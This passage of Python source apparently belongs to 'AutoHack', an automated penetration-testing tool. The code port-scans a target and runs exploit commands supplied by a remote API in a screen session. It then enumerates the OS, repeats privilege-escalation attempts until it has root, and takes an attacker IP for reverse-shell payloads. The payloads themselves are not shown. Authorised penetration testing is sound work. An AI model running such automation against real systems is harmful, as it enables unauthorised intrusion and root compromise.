        # slow execution to ensure attack ran
        time.sleep(delay_seconds)

        output_file_path = os.path.join(self.exploit_directory, f'{self.spearhead_index_unique_id}.txt')
        grab_screen_command = f"screen -r {self.spearhead_index_unique_id} -X hardcopy {output_file_path}"

        # create file with contents
        self.run_command(grab_screen_command, False)

        # close the handle deterministically; terminal dumps may contain bytes
        # that are not valid in the locale encoding, so replace them
        with open(output_file_path, 'r', errors='replace') as output_handle:
            main_screen_output = output_handle.read()

        url = f'{self.api_source}/verify-best-attack-success'
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        response = requests.post(url, json=main_screen_output, headers=headers)
        response_data = response.json()

        return response_data['is_successful']

    def attack_repeatedly(self):
        """
        Repeatedly
            Gets the best attack based on the previous enumeration output
            and then implements attack until all attacks have been exhausted
        """
        self.upload_enumeration_files()

        while True:
            best_attack = self.get_best_attack()
            if not best_attack['should_continue']:
                self.should_kill_heart_beat = True
                print('\n\nNo Exploit Discovered')
                break

            self.execute_attack(best_attack)
            if self.attack_is_successful():
                message = f"\t{Colors.GREEN}{Colors.BOLD}ATTACK SUCCESSFUL{Colors.END} [at {int(time.time())}]\n"
                print(message)
                self.success_status = SuccessStatus.EXPLOIT_NETWORK_SUCCESSFUL
                break

    def get_is_user_root_commands(self) -> dict:
        """
        Fetch the commands (and their expected answers) used to verify
        root access for this session.

        :return: the decoded JSON body returned by ``/get-is-user-root-commands``.
        """
        auth_headers = {'API_KEY': self.api_key, 'session_id': self.session_id}
        endpoint = f'{self.api_source}/get-is-user-root-commands'
        return requests.post(endpoint, headers=auth_headers).json()

    def user_is_root(self) -> bool:
        for key_command in self.expected_command_answers_to_verify_root_access:
            """
                * Runs verification command on spearhead terminal session
                * Runs grab screen session command
                * Examines the output for expected command answers
            """
            data = self.expected_command_answers_to_verify_root_access[key_command]
            expected_output_when_root = data['answer']
            command_wait_time_in_seconds = data['wait']

            tmp_command_file_path = '/tmp/user_is_root.txt'
            self.run_command_and_grab_new_content(
                screen_index=self.spearhead_index_unique_id,
                command=key_command,
                output_file_path=tmp_command_file_path,
                screen_log_update_seconds=command_wait_time_in_seconds,
            )

            output_produced_by_command = open(tmp_command_file_path, 'r').read()

            if expected_output_when_root in output_produced_by_command:
                self.success_status = SuccessStatus.EXPLOIT_OS_SUCCESSFUL
                return True

        return False

    @staticmethod
    def print_user_is_root_successful():
        """Print the tab-indented, green and bold "ROOT ACCESS SUCCESSFUL" line."""
        print('\t' + Colors.GREEN + Colors.BOLD + 'ROOT ACCESS SUCCESSFUL' + Colors.END)

    @staticmethod
    def print_user_is_root_unsuccessful():
        """Print the tab-indented, red and bold "ROOT ACCESS UNSUCCESSFUL" line."""
        print('\t' + Colors.RED + Colors.BOLD + 'ROOT ACCESS UNSUCCESSFUL' + Colors.END)

    def check_if_user_is_already_root(self) -> bool:
        """
        Print a heading, run the root-access verification and print
        whether it succeeded.

        :return: True when ``user_is_root()`` reports root access, else False.
        """
        print(f'\n\n{Colors.CYAN}VERIFYING ROOT ACCESS:{Colors.END}')

        is_root = self.user_is_root()
        if is_root:
            self.print_user_is_root_successful()
        else:
            self.print_user_is_root_unsuccessful()
        return bool(is_root)

    def run_command_and_grab_new_content(
            self,
            screen_index: str,
            command: str,
            output_file_path: str,
            screen_log_update_seconds: int = 15,
    ):
        """
        * Grabs current screen content and determines its length
        * Runs command
        * Grabs the screen content after length
        :return:
        """

        # get log file size
        screen_log_file_path = self.get_screen_log_file(screen_index)
        file_size_before_command_of_interest = os.path.getsize(screen_log_file_path)

        # run the command of interest
        command_on_screen = f'screen -r {screen_index} -X stuff "{command}\n"'
        self.run_command(command_on_screen, False)
        time.sleep(screen_log_update_seconds)

        # read new content from the old starting point
        screen_log_file_handle = open(screen_log_file_path, 'r')
        screen_log_file_handle.seek(file_size_before_command_of_interest)
        content_produced_by_command = screen_log_file_handle.read().rstrip()

        # save new content
        with open(output_file_path, "w") as file:
            file.write(content_produced_by_command)

    def determine_primary_os_enumeration(self) -> dict:
        """
        Detect the target OS and ask the API for primary OS enumeration commands.

        For every entry in ``self.os_discovery_config``:
          * each ``assay`` command is run on the spearhead screen session
          * the output it produced is saved to
            ``<priv_directory>/<assay file_name>``
        All saved files are then uploaded to
        ``/determine-primary-os-enumeration``.

        :return: the decoded JSON response; its ``os`` field is printed.
        """
        print(f"\n\t{Colors.MAGENTA}DETECTING OPERATING SYSTEM{Colors.END} [at {int(time.time())}]")
        files_to_upload = {}

        for discovery in self.os_discovery_config.values():
            for assay in discovery['assay']:
                command = assay['command']
                file_name = assay['file_name']
                output_file_path = os.path.join(self.priv_directory, file_name)

                self.run_command_and_grab_new_content(
                    self.spearhead_index_unique_id,
                    command,
                    output_file_path
                )
                file_name_with_extension = os.path.basename(output_file_path)
                # context manager closes the handle instead of leaking it
                with open(output_file_path, 'rb') as output_handle:
                    files_to_upload[file_name_with_extension] = output_handle.read()

        url = f'{self.api_source}/determine-primary-os-enumeration'
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        response = requests.post(url, files=files_to_upload, headers=headers)
        response_data = response.json()

        detected_os = response_data['os'].title()
        print(f"\n\t{Colors.MAGENTA}OPERATING SYSTEM DETECTED{Colors.END}: {detected_os} \n\n")

        return response_data

    def run_primary_os_enumeration(self, os_enumeration_commands: dict) -> dict:
        """
        Run the primary OS enumeration and upload its result for analysis.

        * runs ``os_enumeration_commands['command']`` on the spearhead session
        * saves the output it produced to
          ``<priv_directory>/<os_enumeration_commands['file_name']>``
        * uploads that file to ``/analyze-primary-os-enumeration``

        :param os_enumeration_commands: mapping with ``command`` and
            ``file_name`` keys.
        :return: the decoded JSON response (intended to carry the secondary
            OS enumeration commands).
        """
        primary_os_enumeration_command = os_enumeration_commands['command']
        primary_os_enumeration_output_file = os.path.join(
            self.priv_directory,
            os_enumeration_commands['file_name']
        )

        # runs primary enumeration command
        self.run_command_and_grab_new_content(
            self.spearhead_index_unique_id,
            primary_os_enumeration_command,
            primary_os_enumeration_output_file
        )

        # uploads result for analysis; the context manager closes the handle
        with open(primary_os_enumeration_output_file, 'rb') as output_handle:
            files_to_upload = {
                os_enumeration_commands['file_name']: output_handle.read()
            }
        url = f'{self.api_source}/analyze-primary-os-enumeration'
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        response = requests.post(url, files=files_to_upload, headers=headers)
        response_data = response.json()
        return response_data

    def attack_os_repeatedly(self, max_tries: int = 10):
        """
            Repeatedly attack os and check for root access
        """

        # repeatedly exploits and check for root access
        tries = 0
        while True:
            # implement code below
            best_attack = self.get_best_os_attack()
            if not best_attack['should_continue']:
                print('\n\nNo OS Exploit Discovered')
                break


            self.execute_os_attack(best_attack)
            if self.user_is_root():
                message = f"\t{Colors.GREEN}{Colors.BOLD}OS ATTACK SUCCESSFUL{Colors.END} [at {int(time.time())}]\n"
                print(message)
                self.success_status = SuccessStatus.EXPLOIT_OS_SUCCESSFUL
                break

            if tries > max_tries:
                break

            tries += 1

    def handle_success(self):
        """
        Tell the user how to attach to the spearhead screen session.

        After an OS-stage result (success or failure), this prints the
        ``screen -r`` command and labels the terminal ROOT or NON-ROOT.
        Any other ``success_status`` prints nothing.
        """
        terminal_kind = {
            SuccessStatus.EXPLOIT_OS_SUCCESSFUL: 'ROOT',
            SuccessStatus.EXPLOIT_OS_UNSUCCESSFUL: 'NON-ROOT',
        }.get(self.success_status)

        if terminal_kind is None:
            return

        print(
            f'\n\n\n'
            f'{Colors.CYAN}{Colors.BOLD}TO ACCESS TARGET {terminal_kind} TERMINAL, RUN COMMAND:{Colors.END}\n'
            f'{Colors.GREEN}{Colors.BOLD}\tscreen -r {self.spearhead_index_unique_id}{Colors.END}'
        )

    def enumerate_network(self) -> None:
        """
        Run the primary (port-scan) enumeration for the selected scan type.

        Every sub-scan command under
        ``self.port_scan_config[self.port_scan_type]`` is passed to
        ``execute_primary_enumerate_command``, together with the shared scan
        data. The method then blocks until the process manager reports that
        all pending processes have completed.
        """
        Utils.print_time()
        print('\n')

        port_scan_data = {
            'nmap_extra': self.nmap_extra,
            'scandir': self.scan_directory,
            'target_address': self.target_address,
            'ports': self.ports,
        }

        selected_scans = self.port_scan_config[self.port_scan_type]
        for scan in selected_scans.values():
            for sub_scan in scan.values():
                self.execute_primary_enumerate_command(sub_scan['command'], port_scan_data)

        self.process_manager.wait_until_pending_processes_have_completed()

    def exploit_network(self) -> None:
        """
        When run in professional mode, code exploits based on
        commands generated by AutoHack's API
        :return:
        """
        if self.professional:
            self.attack_repeatedly()
        AutoHack.should_kill_heart_beat = True

    def enumerate_os(self) -> None:
        """
        When run in professional mode, code tries to get root access
        by first gathering information about OS.

        If user is already root, then this step isn't needed
        :return:
        """
        if self.professional and self.success_status == SuccessStatus.EXPLOIT_NETWORK_SUCCESSFUL:
            self.success_status = SuccessStatus.EXPLOIT_OS_UNSUCCESSFUL
            self.expected_command_answers_to_verify_root_access = self.get_is_user_root_commands()

            if self.check_if_user_is_already_root():
                self.success_status = SuccessStatus.EXPLOIT_OS_SUCCESSFUL
                return

            print(f"\n\n{Colors.CYAN}ENUMERATING OPERATING SYSTEM:{Colors.END}")
            # slow execution so previous step can finish
            time.sleep(10)
            try:
                os_enumeration_commands = self.determine_primary_os_enumeration()
            except (Exception,):
                raise Utils.AutoHackException(
                    f'Error Determining Primary OS Enumerating'
                )

            # run primary os enumeration
            try:
                secondary_enumeration = self.run_primary_os_enumeration(os_enumeration_commands)
                # todo: do secondary enumeration
            except (Exception,):
                raise Utils.AutoHackException(
                    f'Error With Primary OS Enumeration'
                )


    def exploit_os(self) -> None:
        """
        When run in professional mode, code exploits os based on
        commands generated by AutoHack's API
        :return:
        """
        if self.professional and self.success_status == SuccessStatus.EXPLOIT_OS_UNSUCCESSFUL:
            self.attack_os_repeatedly()
        self.handle_success()


if __name__ == "__main__":
    # * Primary Enumeration is based on the:
    #     - user-selected port scan type
    #     - service scans in autohack_config.
    #
    #   This creates xml files which are:
    #     - (secondary) enumerated
    #
    # * Secondary Enumeration is based on the:
    #     - xml output from Primary Enumeration
    #     - service sub-scans in autohack_config.
    #
    #   This creates text files which are:
    #     - analyzed for regex patterns
    #
    # NOTE: the BooleanOptionalAction flags below do not pass `type=bool`.
    # That parameter is deprecated since Python 3.12 and removed in 3.14;
    # the action already derives the value from --flag / --no-flag.
    parser = argparse.ArgumentParser(description='Does Enumeration')
    parser.add_argument(
        '-i', '--ip_address', action='store', type=str,
        dest='ip_address', help='IP Address', required=True
    )
    parser.add_argument(
        '-ai', '--attacker_ip_address', action='store', type=str,
        dest='attacker_ip_address', required=False,
        help='Attackers IP Address, Used When Crafting Reverse Shell Payload'
    )
    parser.add_argument(
        '-c', '--config', action='store', type=str,
        dest='config_folder', help='Config Folder'
    )
    parser.add_argument(
        '-o', '--output', action='store', type=str,
        dest='output_folder', help='Output Folder',
    )
    parser.add_argument(
        '--port_scan_type', action='store', type=str,
        default="full", choices=["quick", "udp", "full"],
        dest='port_scan_type', help='Select The Type of Port Scan'
    )
    parser.add_argument(
        '-ne', '--nmap_extra', action='store', type=str,
        dest='nmap_extra', help='Additional Nmap Args', default='-Pn'
    )
    parser.add_argument(
        '-p', '--ports', action='store', type=str,
        dest='ports', help='Ports to Scan', default='80'
    )
    parser.add_argument(
        '--no_processes', action=argparse.BooleanOptionalAction,
        dest='no_processes', help='Should Not Use Processes For Secondary Enumeration',
        default=False
    )
    parser.add_argument(
        '-v', '--verbose', action=argparse.BooleanOptionalAction,
        dest='verbose', help='Run In Verbose Mode',
        default=False
    )
    parser.add_argument(
        '-ct', '--command_timeout', action='store', type=int,
        dest='command_timeout', help='Max Seconds Command Runs Before Being Killed',
        default=1800
    )
    parser.add_argument(
        '-r', '--retry_max', action='store', type=int,
        dest='retry_max', help='Max Number of Times To Retry A Command',
        default=0
    )
    parser.add_argument(
        '-hbt', '--heart_beat_time', action='store', type=int,
        dest='heart_beat_time', help='Seconds Between Heart Beats',
        default=60
    )
    parser.add_argument(
        '-pro', '--professional',
        action=argparse.BooleanOptionalAction, dest='professional',
        help="Uses AutoHack's API to Iteratively Generate and Run Commands "
             "that Attack Target Machine Based on Previous Command-Output Files. "
             "Only Use This If You Have Permission to Penetrate the Target Machine.",
    )
    args = parser.parse_args()
    autohack = AutoHack(
        ip_address=args.ip_address,
        attacker_ip_address=args.attacker_ip_address,
        output_directory=args.output_folder,
        config_directory=args.config_folder,
        port_scan_type=args.port_scan_type,
        nmap_extra=args.nmap_extra,
        ports=args.ports,
        use_processes=not args.no_processes,
        verbose=args.verbose,
        command_timeout=args.command_timeout,
        heart_beat_time=args.heart_beat_time,
        retry_max=args.retry_max,
        professional=args.professional
    )

    # pipeline: network enumeration -> network exploit -> OS enumeration -> OS exploit
    autohack.enumerate_network()
    autohack.exploit_network()
    autohack.enumerate_os()
    autohack.exploit_os()
    autohack.wait_for_all_processes()

    print('AutoHack Complete')
